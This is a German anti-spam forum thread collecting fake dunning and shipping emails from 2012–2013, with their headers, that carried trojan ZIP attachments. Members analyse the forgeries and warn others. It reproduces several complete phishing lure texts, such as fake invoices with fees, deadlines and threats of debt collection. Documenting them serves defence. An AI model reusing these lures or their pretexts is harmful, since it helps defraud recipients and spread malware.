Zahlschein und Artikel Liste finden Sie in dem beigelegten Schreiben.


Mit verbindlichen Grüßen

WeberVersand GmbH
Firmensitz ist Altenau
Umsatzsteuer DE722435969
Leiter: Nelly Maier


1 Anhang: Bestellung 07.2012.zip 20,4 KB


Return-Path: <232305438 [at] 163.com>
Received: from mproxyjp2.163.com (mproxyjp2.163.com [176.32.86.149])
by mtain-ma03.r1000.mx.aol.com (Internet Inbound) with ESMTP ID: [ID filtered]
for <poor [at] spamvictim.tld>; Mon, 16 Jul 2012 xx:xx:xx -0400 (EDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=163.com;
s=s110527; h=Received:MIME-Version:Date:Subject:From:To:
Content-Type:Message-ID; bh=eKKXjz/H6q/f79j3K3t0LrwsHgVtba/LE4dX
E8NX6Ok=; b=UjUJMxR8gDpCb+NcgClv/d8b9bF8zFFuyXYvOqQ+Iiuj56ubhdkS
XgF0KLbRf++NYy5aV5WL4Ky8kxXZoJyqBvLIV9hVCQTQZHpS07PBTFpZMDYs3RP1
xq3qWsyXlyrOx8q3yBAVlTl5p9Kl6rP8GoQQBlbEWTKs/6njrL9TSU4=
Received: from hetzner-b4d8a54 (unknown [41.203.30.148])
by smtp3 (Coremail) with SMTP ID: [ID filtered]
Tue, 17 Jul 2012 xx:xx:xx +0800 (CST)
MIME-Version: 1.0
Date: Mon, 16 Jul 2012 xx:xx:xx +0200
X-Priority: 3 (Normal)
X-Mailer: Ximian Evolution 3.2.7 (2.4.5-8)
Subject: =?iso-8859-1?Q?Abmahnung_f=FCr__16.07.2012?=
From: 232305438 [at] 163.com
To: poor [at] spamvictim.tld
Content-Type: multipart/mixed;
boundary="-----_chilkat_65f_58af_f8c29788.af61cabc_.MIX"
Message-ID: [ID filtered]
X-CM-TRANSID:DdGowEC5t2+HcgRQoTGbDA--.627S2
X-Coremail-Antispam: 1Uf129KBjvdXoWrtw4DZF4kGFy7ZrW8Gw1rWFg_yoW3KFgE9w
18AFZxCwn8X3yrtw12yw4rtanrZa48ur93G3WjgrW2q34DtFsxX3ZIgay5W3W5KayYya1U
GwnxWrs3Aay7WjkaLaAFLSUrUUUUUb8apTn2vfkv8UJUUUU8Yxn0WfASr-VFAUDa7-sFnT
9fnUUvcSsGvfC2KfnxnUUI43ZEXa7IU09SdPUUUUU==
X-CM-SenderInfo: istsjiavutmqqrwthudrp/1tbiWwrtLU9orrxDAgAAsl
x-aol-global-disposition: S
X-AOL-VSS-INFO: 5400.1158/82274
X-AOL-VSS-CODE: clean
X-AOL-SCOLL-SCORE: 0:2:176455088:93952408
X-AOL-SCOLL-URL_COUNT: 0
X-AOL-SCOLL-AUTHENTICATION: mail_rly_antispam_dkim-d017.1 ; domain : 163.com DKIM : pass
X-AOL-REROUTE: YES
x-aol-sID: [ID filtered]
X-AOL-IP: 176.32.86.149
X-AOL-SPF: domain : 163.com SPF : pass
X-Antivirus: avast! (VPS 120716-0, 16.07.2012), Inbound message
X-Antivirus-Status: Clean

Ich habe mal die beiden 1. Zeilen des Anhang-Quelltextes verglichen.
Sind identisch.

Und auch hier eine tolle "Abmahnung" in holprigem Deutsch mit einem suspekten ZIP-File im Anhang - immerhin haben die sich eine "Steuer-Nummer" ausgedacht :D



Sehr geehrte Damen und Herren,

wohl in unserer Email vom 14.06.2012 wurden Sie informiert, dass die offene Forderung von 1647,63 Euro noch nicht bezahlt wurde. Mit dieser Email verpflichten wir Sie Ihrer Zahlungsverpflichtung nachzukommen.

Weil dies die zweite Forderung ist, die Sie über Ihren Rückstand in Kenntniss setzt, müssen wir Ihnen leider die Kosten von 14,00 Euro dazu zu der noch offenen Forderung als Mahngebühr in Rechnung stellen.

Wir bitten Sie, den offenen Betrag bis zum 16.07.2012 auf das angegebene Konto zu begleichen.

Sonst wird, unsere Forderung Inkassounternehmen geltend zu machen.

Zahlschein und Produkten Liste finden Sie in dem beigelegten Dokument.


Mit freundlichen Grüßen

BrutterShop GmbH
Geschaeftssitz ist Altentreptow
Steuer-Nummer DE806704435
Verantwortlicher: Christina Lorenz


Und hier der Mailheader:


Return-Path: sivmary [at] memanagement.no
Received: from mail11.webhuset.no ([81.27.32.104]) by mx-ha.web.de (mxweb001) with ESMTP (Nemesis) ID: [ID filtered]
Received: (qmail 22129 invoked from network); 16 Jul 2012 xx:xx:xx -0000
Received: from unknown (HELO AMCI-HOSTED156.AMSHOSTED156.AMTS-ACC-Hosted.prod) (sivmary [at] memanagement.no@207.250.240.153) by 0 with ESMTPA; 16 Jul 2012 xx:xx:xx -0000
MIME-Version: 1.0
Date: Mon, 16 Jul 2012 xx:xx:xx -0600
X-Priority: 3 (Normal)
X-Mailer: Evolution/2.9-5mdk
Subject: Abmahnung für xxxxx
From: sivmary [at] memanagement.no
To: "xxxxx" <poor [at] spamvictim.tld>
Content-Type: multipart/mixed; boundary=-----_chilkat_d5b_1458_2f0a5584.54a09577_.MIX
Message-ID: [ID filtered]
Envelope-To: <poor [at] spamvictim.tld>
X-UI-Filterresults: ;V01:K0:Tu2q31Sv:bPSw3iqGQAtsizA4lyJ1TxK0CYqadHkZ8GR m5yspwhl/WYGogo5iT0UsyPIv2kCQyRyJulf7MaUFW+xxgG7ErJUwme/y+6z4sBwgfG72RO FeCayzHbZL7tMPOWykbsaP4Dk38FwzHzUbUTAu7NH+1LzC6ABVdyLuHnmHzuqqcTI=

Seit ca Anfang Mai geistern diese Fakemails massenweise durchs WWW (http://www.google.de/#hl=de&biw=1024&bih=612&sclient=psy-ab&q=+Rechnung+++Email+++zip+anhang&oq=+Rechnung+++Email+++zip+anhang&gs_l=serp.12...7237.7237.0.8632.1.1.0.0.0.0.150.150.0j1.1.0...0.0...1c.ysIwzfjUl FU&pbx=1&bav=on.2,or.r_gc.r_pw.r_qf.,cf.osb&fp=4b4a352b6e15cc0d)

Die Texte und angeblichen Absender wechseln aber das Grundschema ist gleich:
Nachrichten, die erschrecken sollen und die dazu veranlassen sollen, den mit einem Trojaner
verseuchten zip-Anhang zu öffnen.
von focus.de vom 24.7 Internet: Virus lauert hinter falschen Rechnungen per Mail - Computer - FOCUS Online - Nachrichten (http://www.focus.de/digital/computer/internet-virus-lauert-hinter-falschen-rechnungen-per-mail_aid_786607.html)

Gar nicht erst klicken: Mit fingierten Zahlungsaufforderungen per E-Mail versuchen Kriminelle derzeit, Computernutzer übers Ohr zu hauen. Was hilft, ist ein Virenscanner auf Stand.

Was hilft, ist ein Virenscanner auf Stand.

leider hilft noch nichtmal der - ich habe diverse derartige Mails erhalten und bei Virustotal eingeworfen - die Erkennungsquote war, sagen wir es mal diplomatisch, unterirdisch.

Bei diesen Mails hilft ausschließlich der gesunde Menschenverstand.

Symptomatisch für die potentiellen Opfer ist folgende kleine Anekdote aus den letzten Tagen:
Kunder erhält Mail, rennt damit zum Anwalt - der sagt: alles inkl. Anhänge ausdrucken und dann mitbringen. Verwandschaft ruft dann bei mir an und fragt nach. Ich sagte gleich am Telefon: ungelesen löschen, bei Mißtrauen an mich weiterleiten OHNE den Anhang zu öffnen.
Die folgenden Tage erhilt ich diverse Mails weitergeleitet, trotz einer entsprechenden Kommentierung.

Da frage ich mich doch zusätzlich: braucht auch dieser Anwalt einen Internetführerschein?

Die scheinen eine neue Runde zu starten!

http://www.gutefrage.net/frage/abhocke-hilfe

Vorgestern gab es auch schon eine ähnliche Frage.

Hier auch wieder eingeschlagen:


Sehr geehrter Benutzer H. T.,

wir haben Sie schon in unserer Email vom 08.07.2012 gemahnt, dass die nicht bezahlte Rechnung von 7665,67 Euro von Ihnen noch nicht überwiesen wurde. Wir fordern Sie damit ein letztes Mal, Ihrer Verpflichtung nachzukommen.

Wir sehen uns gezwungen Ihnen leider die Kosten von 15,00 Euro darüber hinaus zu der noch offenen Forderung als Mahngebühr in Rechnung stellen.

Wir bitten Sie, die nicht bezahlten Kosten bis zum 23.08.2012 auf das angegebene Konto zu übersenden.

Zahlschein und Artikel sind in dem beigelegten Schreiben.

Mit verbindlichen Grüßen

BrandtOnline GmbH
(Mo-Fr 8.00 bis 18.00 Uhr, Sa 10.00 bis 18.00 Uhr)
Gesellschaftssitz ist Auerbach
Umsatzsteuer-ID: [ID filtered]
Geschäftsfuehrer: M. W.

From - Wed Aug 22 xx:xx:xx 2012
X-Account-Key: account1
X-UIDL: [UID filtered]
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Return-Path: <stef [at] desertinet.com>
Delivered-To:
Received: (qmail invoked by alias); 21 Aug 2012 xx:xx:xx -0000
Received: from smtp201.dfw.emailsrvr.com (EHLO smtp201.dfw.emailsrvr.com) [67.192.241.201]
by mx0.gmx.net (mx005) with SMTP; 22 Aug 2012 xx:xx:xx +0200
Received: from localhost (localhost.localdomain [127.0.0.1])
by smtp20.relay.dfw1a.emailsrvr.com (SMTP Server) with ESMTP ID: [ID filtered]
for ; Tue, 21 Aug 2012 xx:xx:xx -0400 (EDT)
X-Virus-Scanned: OK
Received: by smtp20.relay.dfw1a.emailsrvr.com (Authenticated sender: stef-AT-desertinet.com) with ESMTPA ID: [ID filtered]
for ; Tue, 21 Aug 2012 xx:xx:xx -0400 (EDT)
MIME-Version: 1.0
Date: Tue, 21 Aug 2012 xx:xx:xx -0700
X-Priority: 3 (Normal)
X-Mailer: Microsoft Outlook Express 9.57.6504.6948
Subject: =?iso-8859-1?Q?Mahnung_f=FCr_H?=
=?iso-8859-1?Q?_T_175770935?=
=?iso-8859-1?Q?31?=
From: stef [at] desertinet.com
To:
Content-Type: multipart/mixed;
boundary="-----_chilkat_582_943b_2190eabf.0fa78ac5_.MIX"
Message-ID: [ID filtered]
X-GMX-Antivirus: 0 (no virus found)
X-GMX-Antispam: 0 (BackTrace mail analyze);
Detail=5D7Q89H36p4L00VTXC6D4q0N+AH0PUCnGL2vqOgpaBYL16oitsMrgDt/NQNpSCZFFjDOy
97xb7Zpf+wZnd5ZXNcvLDXR3Wg3wRjdQbwEMh8=V1;

Ganz ehrlich. Bei einer Zahlsumme von 7.665,67€ pfeife ich auf die 15€ Mahnkosten. Dafür öffne ich doch echt keinen Anhang... ;)

Ich hoffe, ich habe es hier richtig reingestellt.
Bekam heute eine Mahnung in Höhe von 775,21 Euronen.
Mit Rechnung im Anhang.
Da ich garantiert dort nichts bestellt habe, habe ich mal nach
der Adresse gegoogelt. Und da konnte ich lesen, dass das
ein Trojaner ist.
Also bei dem Betrag könnte ich mir vorstellen, dass einige
erschreckt draufklicken werden.
Schmidt-Online GmbH Arnstein
(Mo-Fr 9.00 bis 18.00 Uhr, Sa 9.00 bis 16.00 Uhr)
Geschäftsführer: J. F.
Steuer-Nr.: DE149831047

Guten Morgen zusammen,

das ist grade im Spamordner gelandet.
Im Anhang die "Letzte Mahnung 30.08.2012.zip" mit 41,1 KB

Gruß Frechdachs



Sehr geehrter Kunde,

bei der Durchsicht unserer Rechnungen stellten wir fest, dass Sie die Bestellung Nummer 5635215-2012 noch nicht beglichen haben.

Artikel: Apple WG7W5 1764,99 Euro

Hiermit verpflichten wir Sie erneut, Ihre offene Rechnung zu begleichen und damit weitere Inkasso-Büro Kosten einzusparen.

Wir müssen Ihnen 13,00 Euro dazu zu der noch offenen Forderung als Mahngebühr in Rechnung stellen.
Wir bitten Sie, die nicht bezahlten Kosten bis zum 05.09.2012 auf das angegebene Konto zu überweisen.

Der Überweisungsschein und die Lieferadresse liegen dieser E-Mail als Kopie bei.

Mit verbindlichen Grüßen

SchulzeOnlineShop GmbH Aschersleben
Geschäftsführer: J. G.
Umsatzsteuer-Nr.: DE690152448



Return-Path: <isaacch [at] netvision.net.il>
Received: from mxout1.netvision.net.il (mxout1.netvision.net.il [194.90.9.20])
by mtain-dg10.r1000.mx.aol.com (Internet Inbound) with ESMTP ID: [ID filtered]
for <poor [at] spamvictim.tld>; Wed, 29 Aug 2012 xx:xx:xx -0400 (EDT)
MIME-version: 1.0
Content-type: multipart/mixed; boundary="Boundary_(ID_CMmFALtLwwQ5CjWqn6Ifrw)"
Received: from server1.Taylor.local ([66.49.14.106]) by mxout1.netvision.net.il
(Oracle Communications Messaging Server 7u4-24.01(7.0.4.24.0) 64bit (built Nov
17 2011)) with ESMTPA ID: [ID filtered]
name [at] provider.com; Thu, 30 Aug 2012 xx:xx:xx +0300 (IDT)
Date: Wed, 29 Aug 2012 xx:xx:xx -0500
X-Priority: 3 (Normal)
X-Mailer: Pegasus Mail for Win32 (v4.31b)
Subject: Mahnung Kundennummer: 9807858776
From: isaacch [at] netvision.net.il
To: poor [at] spamvictim.tld
Message-id:
<OUTLOOK-IDM-b6430c28-0357-1f5a-0041-662bbbd5f1b9 [at] server1.Taylor.local>
x-aol-global-disposition: G
X-AOL-VSS-INFO: 5400.1158/83488
X-AOL-VSS-CODE: clean
x-aol-sID: [ID filtered]
X-AOL-IP: 194.90.9.20
X-AOL-SPF: domain : netvision.net.il SPF : pass
X-Antivirus: avast! (VPS 120829-1, 29.08.2012), Inbound message
X-Antivirus-Status: Clean

hallo,auch ich habe heute eine mail bekommen,wonach ich am 8. eine nikon bestellt haben soll.ich habe den anhang nicht geöffnet,da ich mir 100% sicher bin,des es nicht stimmt.


Hallo, bei der Durchsicht unserer Zahlungseingänge stellten wir fest, dass Sie die Rechnung Nummer 4547389/2012 noch nicht beglichen haben. Artikel: Nikon RW53V 2037,75 Euro Hiermit fordern wir Sie so schnell wie möglich, Ihre offene Rechnung zu begleichen und damit weitere juristische Kosten einzusparen. Wir sehen uns gezwungen Ihnen 13,00 Euro darüber hinaus zu der noch offenen Forderung als Mahngebühr in Rechnung stellen.Wir bitten Sie, den fälligen Betrag bis zum 01.09.2012 auf das angegebene Konto zu übersenden. Die Rechnung und die Lieferadresse liegen diesem Brief als Beilage bei.
Mit verpflichtenden Grüßen
BrutterShop GmbH
Adenau
Leiter: M. F.
Fimen-Nummer: DE940373153

das ist der Inhalt dieser Mail.
wie soll ich mich jetzt weiter verhalten?

wie soll ich mich jetzt weiter verhalten?

Wie wäre es mit löschen, oder hättest du gern einen Trojaner (http://de.wikipedia.org/wiki/Trojanisches_Pferd_(Computerprogramm)) auf deinem Rechner?

gelöscht hab ich sie und vorher hab ich die mail als betrügerische pishingmail gemeldet.
was ich meine,kommt da noch was nach?von denen,die mir die mail geschickt haben,soll ich das ausdrucken und zur pol?oder einfach nichts weiter machen?

kommen wird sowas immer mal.
Einfach löschen. Ob du zur Polizei gehst oder nicht, bleibt halt dir überlassen.
Allerdings wird da nix unternommen, weil das ja nicht die Firma ist die da als sogenannter Absender steht.
Währe auch wie ein Streichholz im Atlantischen Ozean zu finden :-)

Man sollte solche Mails löschen und ignorieren. Die Täter sind regelmäßig nicht zu ermitteln, weil der Mailversand anonym über mehrere Zwischenstufen getarnt wird.

Heute schlugen gleich acht Mails auf, in denen die Masche auf Englisch versucht wird. Drei Beispiele:

Return-Path: <quickie [at] royalmail.com>
Delivery-Date: Mon, 10 Sep 2012 xx:xx:xx +0200
Received-SPF: neutral (mxbap3: 123.157.211.34 is neither permitted nor denied by domain of royalmail.com) client-ip=123.157.211.34; envelope-from=quickie [at] royalmail.com; helo=[123.157.211.34];
Received: from [123.157.211.34] ([123.157.211.34]) by mx.kundenserver.de (node=mxbap3) with ESMTP (Nemesis) ID: [ID filtered]
Received: from VFUS-MBX03.vf-us.internal.vodafone.com ([::1]) by VFUS-CAS01.vf-us.internal.vodafone.com ([10.181.10.42]) with mapi; Mon, 10 Sep 2012 xx:xx:xx +0800
From: Royal Mail <noreply [at] royalmail.com>

Delivery-Date: Mon, 10 Sep 2012 xx:xx:xx +0200
Received-SPF: neutral (mxeu5: 14.219.190.214 is neither permitted nor denied by domain of royalmail.com) client-ip=14.219.190.214; envelope-from=skitingku8 [at] royalmail.com; helo=[14.219.190.214];
Received: from [14.219.190.214] ([14.219.190.214]) by mx.kundenserver.de (node=mxeu5) with ESMTP (Nemesis) ID: [ID filtered]
Received: from outmail012.snc7.facebook.com (HELO mx-out.facebook.com) ([69.171.232.146]) with ESMTP; Mon, 10 Sep 2012 xx:xx:xx +0800
Received: from [10.64.120.50] ([10.64.120.50:34638]) by smout016.snc7.facebook.com (envelope-from <notification+kjdm-dj-hud_ [at] facebookmail.com>) (ecelerity 2.2.2.45 r(34222M)) with ECSTREAM ID: [ID filtered]
X-Facebook: from zuckmail ([MTI3LjAuMC4x]) by graph.facebook.com with HTTP (ZuckMail);
Date: Mon, 10 Sep 2012 xx:xx:xx +0800
From: Facebook <notification+ntlq-mb-zzg_ [at] facebookmail.com>
Man beachte, dass die eben genannte Mail angeblich von Facebook kommt, angekündigt wird aber ein Geschäftsvorgang der britischen Royal Mail :facepalm:

Return-Path: <quickie [at] royalmail.com>
Delivery-Date: Mon, 10 Sep 2012 xx:xx:xx +0200
Received-SPF: neutral (mxbap3: 123.157.211.34 is neither permitted nor denied by domain of royalmail.com) client-ip=123.157.211.34; envelope-from=quickie [at] royalmail.com; helo=[123.157.211.34];
Received: from [123.157.211.34] ([123.157.211.34]) by mx.kundenserver.de (node=mxbap3) with ESMTP (Nemesis) ID: [ID filtered]
Received: from VFUS-MBX03.vf-us.internal.vodafone.com ([::1]) by VFUS-CAS01.vf-us.internal.vodafone.com ([10.181.10.42]) with mapi; Mon, 10 Sep 2012 xx:xx:xx +0800
From: Royal Mail <noreply [at] royalmail.com>
Der Betreff ist in allen Mails "Royal Mail Shipping Advisory, Mon, 10 Sep 2012 [leicht variierende Uhrzeit] +0800", morgen dann vermutlich mit Datum von morgen. Auch die Texte gleichen sich:


Royal Mail Group Shipment Advisory The following 1 piece(s) have been sent via Royal Mail on Mon, 10 Sep 2012 [Uhrzeit aus dem Betreff] +0800, REF# [zehnstellige Zahl, vermutlich zufällig erzeugt, in jeder Mail eine andere] SHIPMENT CONTENTS: Documents SHIPPER REFERENCE: PLEASE REFER TO ATTACHED FILE ADDITIONAL MESSAGE FROM SHIPPER: PLEASE REFER TO ATTACHED FILE Royal Mail Group Ltd 2012. All rights reserved
Allen Mails ist der Anhang "Royal_Mail_Shipping_Ref[zwei Buchstaben, fünf Zahlen, in jeder Mail andere].zip", welcher laut virustotal.com mindestens zwei verschiedene Trojaner enthält.

Wie immer gilt: Niemals Dateianhänge öffnen, welche nicht hundertprozentig sicher aus zuverlässigen Quellen stammen, im Zweifel immer beim vermeintlichen Absender rückfragen!

Heute für DHL, wieder englischsprachig:

Return-Path: <levelnessnow25 [at] dhl.com>
Delivery-Date: Wed, 12 Sep 2012 xx:xx:xx +0200
Received-SPF: softfail (mxeu5: transitioning domain of dhl.com does not designate 203.125.40.101 as permitted sender) client-ip=203.125.40.101; envelope-from=levelnessnow25 [at] dhl.com; helo=[203.125.40.101];
Received: from [203.125.40.101] ([203.125.40.101]) by mx.kundenserver.de (node=mxeu5) with ESMTP (Nemesis) ID: [ID filtered]
X-Spam-Relays-Untrusted: [ ip=165.72.200.102 rdns= helo=gateway1c.dhl.com by=mail5.getronics.com ident= envfrom= intl=0 id= auth= msa=0 ] [ ip=2.116.16.209 rdns=gb-dkgivr01.gb.dhl.com helo=gb-dkgivr01 by=gateway1c.dhl.com ident= envfrom= intl=0 id= auth= msa=0 ] [ ip=2.116.16.209 rdns= helo=gb-dkgivr01 by=gb-dkgivr01 ident= envfrom= intl=0 id= auth= msa=0 ]
Received: from gateway1c.dhl.com ([165.72.200.102]) by mail5.getronics.com with ESMTP; Wed, 12 Sep 2012 xx:xx:xx +0800
Received: from gb-dkgivr01.gb.dhl.com (HELO gb-dkgivr01) ([2.116.16.209]) by gateway1c.dhl.com with ESMTP; Wed, 12 Sep 2012 xx:xx:xx +0800
Received: from gb-dkgivr01 ([2.116.16.209]) by gb-dkgivr01 with Microsoft SMTPSVC(5.0.2195.6713); Wed, 12 Sep 2012 xx:xx:xx +0800
Date: Wed, 12 Sep 2012 xx:xx:xx +0800

Wie man sieht, zuverlässig als Spam erkannt. Der Betreff lautet "DHL Online Billing Notification [drei Buschstaben, 8 Zahlen]", Text:


Thank you for using the DHL Online Billing service.

Note the Terms of the contract stating you will pay electronically and not via a paper check with this billing option.
If you have any issues/concerns with this invoice or wish to contact DHL, please read below for instructions.

Your latest invoice:
Invoice Date: 08/31/2012

Customer Number: *** [von Mittwoch entfernt]
Invoice Number: *** [von Mittwoch entfernt]

Invoice Due Date: 09/15/2012
Invoice Total: $39.57
Total Airbills: 3

If you have chosen to receive shipment level information with this invoice, it is included in the attachment sent with this message with full details.

To pay your invoice(s) online, simply login to DHL (https://sso.dhl-usa.com/) and click on the "View Online Billing account" link; you can then select the invoice(s) you wish to pay on the "Open Invoices" page and press the "Schedule payment(s)" link to schedule your payment. You can have your invoice(s) automatically paID: [ID filtered]

Thank you for choosing DHL.
***********************************************************************
Please do not reply to this email; it is used to send automated emails and is not monitored for responses. If you have questions, please contact DHL Customer Support at 1-800-722-0081. If you wish to communicate via email, please visit (http://www.dhl-usa.com/custserv/contactus.asp?nav=ContactUs).
Angehängt ist eine "DHL_Billing_Notification[drei Buchstaben, acht Zahlen, nicht mit der Nummer aus dem Betreff identisch].zip", bei der es – wen wunderts noch – Treffer für drei verschiedene Trojaner gibt. Also auch hier Finger weg!

Schmidt-Online GmbH Arnstein
ist weiterhin aktiv. Welcher Trojaner
in der sogenannten Rechnung drin ist,
wurde allerdings bei web.de nicht angezeigt.
Aber bei dem Betrag von 775,21 werden sicher
einige aufgeschreckt draufklicken.

Hab das Knopferl nicht gefunden, womit ich
den Header hier einfügen könnte, falls es nötig wäre. :o

Hab das Knopferl nicht gefunden, womit ich
den Header hier einfügen könnte, falls es nötig wäre. :o
Das Tag ist: ... . Button is nich, selber tippen!

Alle weiteren Codes, die nicht im Editor mit Button realisiert sind, sind hier zu finden

BBCode (https://www.antispam-ev.de/forum/misc.php?do=bbcode)

4479

Danke für die Info.
Habe es hier eingefügt.

Return-Path: mahnstelle [at] schmidt-online.de
Received: from [85.114.128.67] ([127.0.0.1]) by g067.green.fastwebserver.de with Microsoft SMTPSVC(7.5.7600.16385); Sun, 25 Nov 2012 xx:xx:xx +0100
Received: from g067.green.fastwebserver.de ([85.114.128.67]) by mx-ha.web.de (mxweb106) with ESMTP (Nemesis) ID: [ID filtered]
Message-ID: [ID filtered]
Mime-Version: 1.0
From: Schmidt-Online GmbH <mahnstelle [at] Schmidt-Online.de>
To: poor [at] spamvictim.tld
Subject: Rechnung 28.08.2012 - Schmidt-Online GmbH
Date: Sun, 25 Nov 2012 xx:xx:xx +0100
X-Bounce-Tracking-Info: <CQkJZWRpdGgudGhhaXNzQHdlYi5kZQlSZWNobnVuZyAyOC4wOC4yMDEyIC0gU2NobWlkdC1PbmxpbmUg R21iSAkxMwkJMjM4MDMxCWJvdW5jZQlubwlubw==>
Content-Type: multipart/mixed; boundary="--=BOUNDARY_1125235_GXFA_AOCS_IUYY_UQEB"
X-OriginalArrivalTime: 25 Nov 2012 xx:xx:xx.0927 (UTC) FILETIME=[0C1B8370:01CDCB59]
Envelope-To: <poor [at] spamvictim.tld>
X-UI-Filterresults: ;V01:K0:2TTc+07E:HRkIQNRvZNCU6wdJvCPbExkSCCg81I/HG8y 0yNt3ynd7QxRUk8VltoQq/aL9ggK0Aru4YIvLdlIZc6O/k2TAFe6yiACloArVTYDbHqrpxk w=

Neues Jahr, neue Runde....

X-Envelope-From: <c_r_a_z_y_f_l_o [at] web.de>
X-Envelope-To: <i^^^^@^^^^.de>
X-Delivery-Time: 1358330776
X-UID: [UID filtered]
Return-Path: <c_r_a_z_y_f_l_o [at] web.de>
X-RZG-FWD-BY: ^^^^@^^^^^^.de
Received: from mailin.rzone.de (jored mi36) ([unix socket])
by mailin.rzone.de (jored mi36) (RZmta 31.12) with LMTPA;
Wed, 16 Jan 2013 xx:xx:xx +0100 (CET)
X-RZG-MI-VALUES: bm=0 mafl=1 sh=0 du=0 sp=2,1 vv=1 nf=0
X-Strato-MessageType: email
X-RZG-CLASS-ID: [ID filtered]
Received: from mout.web.de ([212.227.15.4])
by mailin.rzone.de (jored mi36) (RZmta 31.12 OK)
with ESMTP ID: [ID filtered]
Wed, 16 Jan 2013 xx:xx:xx +0100 (CET)
Received: from PackardBell-PC ([145.53.174.4]) by smtp.web.de (mrweb003) with
ESMTPSA (Nemesis) ID: [ID filtered]
Wed, 16 Jan 2013 xx:xx:xx +0100
From: <c_r_a_z_y_f_l_o [at] web.de>
To: "Daniel Klxxxx" <^^^^@^^^^^^.de>
Subject: Daniel Kxxx, MahnbescheID: [ID filtered]
Date: Wed, 16 Jan 2013 xx:xx:xx GMT

Guten Tag lieber Kunde/Kundin Dxxxxx Klxxxxxx

Aktennummer: AZ85635719
Kundennummer: 26146156 Dxxxxxx Kxxxxxxxx


in aufgeführter Angelegenheit haben wir Sie schon mehrfach schriftlich zur Zahlung aufgefordert und auf die sehr schwere Folgen einer Nichtzahlung hingewiesen. Bis jetzt ist keine Zahlung eingegangen.

Wir hatten bereits angekündigt, den Saldo an verschiedene Wirtschaftsauskunfteien zu melden, die Voraussetzungen nach dem BDSG sind erfüllt.
Im weiterem Verlauf werden wir beim zuständigen Gericht einen gerichtlichen MahnbescheID: [ID filtered]

Rechnungseinzelheiten und Widerspruch Hinweise finden Sie in beigefügtem Anhang.

Die Bestellnummer: 74632319236 bei Primustronix AG 552,55 EU

Bitte ersparen Sie sich weitere Unannehmlichkeiten und Kosten und begleichen Sie umgehend die beigefügte Rechnung.

Mit verbindlichen Grüßen

WeberNet GmbH
Annaberg-Buchholz
DE3033715588
Pxxxx Hxxx

hatt mir heut auch einer der Nutzer des Trojaner boards gesendet, ist der sogenannte Verschlüsselungstrojaner mit nem Backdoor.

Received: from 203-156-233.mclink.it (adsl203-156-233.mclink.it [213.203.156.233])
by mx.kundenserver.de (node=mxeu0) with ESMTP (Nemesis)
ID: [ID filtered]
Return-Path: <online [at] booking-lufthansa.com>
Received: from mail.pcsoffice02.de (mail.pcsoffice02.de [213.61.9.130]) by mx.kundenserver.de (node=mxbap1) with ESMTP (Nemesis) ID: [ID filtered]
Received: from booking-lufthansa.com ([213.61.9.129]) (authenticated user poor [at] spamvictim.tld) by mail.pcsoffice02.de for <poor [at] spamvictim.tld>; Mon, 21 Jan 2013 xx:xx:xx +0100


Falls Sie diese Reiseinformation nicht oder nur teilweise lesen konnen, offnen Sie bitte die angehangte PDF-Version. Bitte antworten Sie nicht auf diese E-Mail. Direkt-Antworten an den Absender konnen nicht bearbeitet werden. Um mit Lufthansa in Kontakt zu treten, rufen Sie bitte den Hilfe &amp; Kontakt-Bereich auf www.lufthansa.com auf.

Buchungscode:N13FFJ

Flugscheindetails & Reiseinformationen in der beigefugten Datei

* Den Passenger Receipt (Rechnungsbeleg) erhalten Sie durch einen Klick auf die Flugscheinnummer bis 30 Tage nach Reisebeginn.

Deutsche Lufthansa AG

Die Beforderung unterliegt den Beforderungsbedingungen fur Fluggaste und Gepack der Lufthansa. Die Deutsche Lufthansa haftet nicht fur von Ihnen oder Dritten vorgenommene Veranderungen der ubermittelten Daten. Alle Angaben ohne Gewahr.
Bei den angegebenen Zeiten handelt es sich um Ortszeiten.

Sitz der Gesellschaft:Deutsche LufthansaAktiengesellschaft, KolnRegistereintragung:Amtsgericht KolnHR B 2168Vorsitzender des Aufsichtsrats: [schnippschnapp]
Der Mail hängt eine "Flugscheindetails.zip" an, die – wen wundert's – ziemlich virenverseucht ist, siehe zum Beispiel Virustotal.com (https://www.virustotal.com/file/ca63b256527b1767b7fe5e36e1a98ddf59a57c9cb55784f9e4ce82d21e9228c3/analysis/). Die letzten beiden Headerzeilen sind mit Sicherheit gefälscht. Tatsächlich kommt die Mail nicht von der Lufthansa, sondern wurde über einen italienischen Dialin-Zugang abgworfen (213.203.156.233 bzw. adsl203-156-233.mclink.it); vermutlich ein Zombie.

Also: Finger weg!
Schönen Gruß
Mittwoch

Received: from [193.230.193.130] (unknown [193.230.193.130])
by xxx.xxx.xxx (Postfix) with ESMTP ID: [ID filtered]
for <poor [at] spamvictim.tld>; Mon, 21 Jan 2013 xx:xx:xx +0100 (CET)
Received: from mail.pcsoffice02.de (mail.pcsoffice02.de [213.61.9.130]) by mx.kundenserver.de (node=mxbap1) with ESMTP (Nemesis) ID: [ID filtered]
Received: from booking-lufthansa.com ([213.61.9.129]) (authenticated user poor [at] spamvictim.tld) by mail.pcsoffice02.de for <poor [at] spamvictim.tld>; Mon, 21 Jan 2013 xx:xx:xx +0200
Message-ID: [ID filtered]
From: "Lufthansa.com" <online [at] booking-lufthansa.com>

Hallo,

da ich bei Google nichts derartiges gefunden habe, dachte ich, ich poste das mal hier. Ist es möglich, dass bei einer Onlineapotheke (ich bestelle desöfteren bei diversen für meine Mutter, allerdings noch nie bei Sanicare) Daten entwendet wurden? Jedenfalls werde ich mit dem Korrekten Namen angespochen, der Rest ist allerdings blanker Unsinn.

Der Mail hängt ein ZIP-Archiv an, in der ein weiteres ZIP-Archiv enthalten ist, und in diesem wiederum eine .com-Datei (ausführbare Datei). Soll wohl diverse Virenscanner irritieren.

Hier mal der Klartext und Header:

Return-Path: leonskuddis [at] web.de
Received: from mout.web.de ([212.227.17.12]) by mx-ha.gmx.net (mxgmx010) with
ESMTP (Nemesis) ID: [ID filtered]
23 Jan 2013 xx:xx:xx +0100
Received: from thomas-383f5ec1 ([91.40.29.3]) by smtp.web.de (mrweb001) with
ESMTPSA (Nemesis) ID: [ID filtered]
23 Jan 2013 xx:xx:xx +0100
From: <leonskuddis [at] web.de>
To: "**** ********" <************@gmx.de>
Subject: 23.01.2013 **** ******** Letzte Mahnung Nr. 29767
Date: Wed, 23 Jan 2013 xx:xx:xx GMT
MIME-Version: 1.0
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-Priority: 3
